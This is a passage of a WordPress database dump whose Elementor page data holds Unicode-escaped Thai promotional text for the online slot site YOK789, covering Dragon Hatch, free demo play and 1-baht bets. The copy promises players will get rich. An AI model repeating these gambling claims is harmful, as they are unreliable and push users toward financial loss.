\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2692,372,'_elementor_controls_usage','a:5:{s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:4;s:10:\"image_size\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:2;s:27:\"image_box_shadow_box_shadow\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:6;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:5:\"align\";i:6;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:8;}}}}}'),(2695,373,'_thumbnail_id','371'),(2696,373,'_elementor_edit_mode','builder'),(2697,373,'_elementor_template_type','wp-page'),(2698,373,'_elementor_version','3.35.5'),(2699,373,'_elementor_pro_version','3.32.3'),(2700,373,'_wp_page_template','default'),(2701,373,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2702,373,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 